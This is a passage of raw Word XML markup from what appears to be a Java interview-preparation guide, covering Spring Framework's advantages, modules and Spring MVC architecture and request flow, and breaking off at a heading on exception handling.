        <w:t>, enabling them to handle distributed transactions with greater resilience and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B056F" w14:textId="725F0B95"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08C5329">
          <v:rect id="_x0000_i2039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5D816" w14:textId="77777777" w:rsidR="00D55EBE" w:rsidRPr="00CE4B95" w:rsidRDefault="00D55EBE" w:rsidP="00D55EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F5152D" w14:textId="77777777" w:rsidR="00516033" w:rsidRPr="00CE4B95" w:rsidRDefault="0051603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02ADBE85" w14:textId="4865EAFF" w:rsidR="00F80B96" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="005C6E50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="_Toc197867650"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p w14:paraId="5E86E422" w14:textId="77777777" w:rsidR="006513B8" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8" w:rsidP="006513B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767801AC" w14:textId="22F8224F" w:rsidR="00185359" w:rsidRPr="00CE4B95" w:rsidRDefault="00F84289" w:rsidP="00185359">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="_Toc197867651"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Framework? What are its advantages</w:t>
      </w:r>
      <w:r w:rsidR="00185359" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w14:paraId="460FA82E" w14:textId="5E586C0F" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="006926B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40" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6606F" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A423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Concepts of Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE5D23"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IoC (Inversion of Control): </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring manages object creation and lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7E740"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 (Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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OP (Aspect-Oriented Programming):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ular Architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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41" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD385AC"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CE4B95" w14:paraId="212E401A" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CBBEA6F"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42353" w:rsidRPr="00CE4B95" w14:paraId="413D4774" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065DF79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is lightweight in terms of size and overhead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="3553FC39" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66EAFB2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Dependency Injection to decouple application objects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="088E743D" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FFF676"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 can use only the modules they need (e.g., Spring Boot, Spring Security, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="41F76C6D" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C0DEE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writing testable code with support for JUnit and Mockito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="2762D6A8" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C07697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Hibernate, JPA, JMS, Quartz, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="4EDDE020" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D1AF85"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ly separates concerns like logging, transactions, and security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="71DC7F1E" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EC022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abstraction over various transaction APIs like JTA, JDBC, Hibernate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="782EE849" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3305860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 is a robust model-view-controller web framework.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="530DD0D0" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A923A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pid application development with embedded servers and auto-configuration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="2DBE65C6" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54108D2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offers powerful authentication and authorization mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A42353" w:rsidRPr="00CE4B95" w14:paraId="757F29B9" w14:textId="77777777" w:rsidTr="007D6661">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3357" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C53284E"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community support and excellent documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A709E30"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42" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71543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pring Modules Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB834A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re: Core container and DI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C86B0C"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ntext: Application context features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF5B5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aop: Aspect-oriented programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EEF7E"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jdbc: JDBC and DataSource support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D69009"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tx: Transaction management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A608C4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orm: Integration with ORM tools like Hibernate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F14B11"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web: Web integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9A08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mvc: Web MVC framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFE3E2"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 Authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58063F93"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 Simplifies project setup and development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1C884"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43" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDFB9D" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A42353">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBA4A24" w14:textId="38326581" w:rsidR="006513B8" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc197867652"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring MVC architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w14:paraId="310AF2F6" w14:textId="59D31F61" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00EF08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MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Model-View-Controller) is a part of the Spring Framework used to build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44" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1E85F" w14:textId="77777777" w:rsidR="002E4600" w:rsidRPr="00CE4B95" w:rsidRDefault="002E4600" w:rsidP="00AB3F04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4ABA2" w14:textId="2DA213E4"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pring MVC Architecture Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A41C330"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owser (Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA1275" w14:textId="0795E92E"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9D2DC74"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DispatcherServlet (Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960590F" w14:textId="1D1F441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045654B"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ndlerMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314BEE13" w14:textId="5383A03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48F9243F"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F05A75" w14:textId="7BA61580"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57CAFE9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Service Layer (Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2196AB26" w14:textId="197CE882"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2C3089A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DAO Layer (Database Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E8684" w14:textId="1840F8D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71B5988"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Model (Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F469F9A" w14:textId="53AF8B4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0365D80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View Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E1CFF" w14:textId="2AFC102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1F4B5E45"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View (JSP/HTML/Thymeleaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C4BD1" w14:textId="2304274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3AA56718" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="0051728A">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sent to Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670D935"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45" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249D01F"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CE4B95" w14:paraId="1C8CEE0B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C2177E"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B3F04" w:rsidRPr="00CE4B95" w14:paraId="12844D99" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6594EDD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CE4B95" w14:paraId="7782BD21" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A1B31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es which controller should handle the request based on URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="21012D7B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9E99B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the request, calls the business logic, and returns a ModelAndView object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="0FADF4B4" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453A915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business logic and handles processing of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="2A53DC29" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F91677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es with the database using technologies like JPA, JDBC, or Hibernate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="0BCDC85A" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E31DD2B"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data returned from the controller and passed to the view.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="24BB5744" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="708BDC70"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logical view names (like "home") to actual views (like home.jsp).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="7D8C9B9B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420F8FE3"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nders the final output to the client (JSP, Thymeleaf, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="163A84B8"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46" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02409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 Flow Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775A29A"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ient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a request (e.g., /getEmployee).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBA013"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 receives it and checks HandlerMapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868C0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ropriate @Controller method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A394A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troller interacts with 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O</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A1F0F"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ata is placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D667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returns a logical view name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4301AD"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Resolver maps it to an actual view (e.g., employee.jsp).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4090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renders the model data and sends the response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA96A7"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47" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="247240F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CE4B95" w14:paraId="4FF13440" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E33E5DA"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B3F04" w:rsidRPr="00CE4B95" w14:paraId="6B622615" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736E4D7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ontroller class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="14E6B696" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5BE85E"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to methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="3103A32E" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F74BA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HTTP methods for URL mapping.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="7AA6FE73" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7397F65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s Java object directly as response (usually JSON).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="4BE504CA" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737C817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s request parameters to method parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="532F1A3C" w14:textId="77777777" w:rsidTr="00AB3F04">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BF58BF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path or query parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="510E400B"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48" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D24F0" w14:textId="76B138AB" w:rsidR="00CB783B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CB783B" w:rsidP="00CB783B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="439" w:name="_Toc197867653"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How do you handle exceptions in Spring MVC?</w:t>
      </w:r>
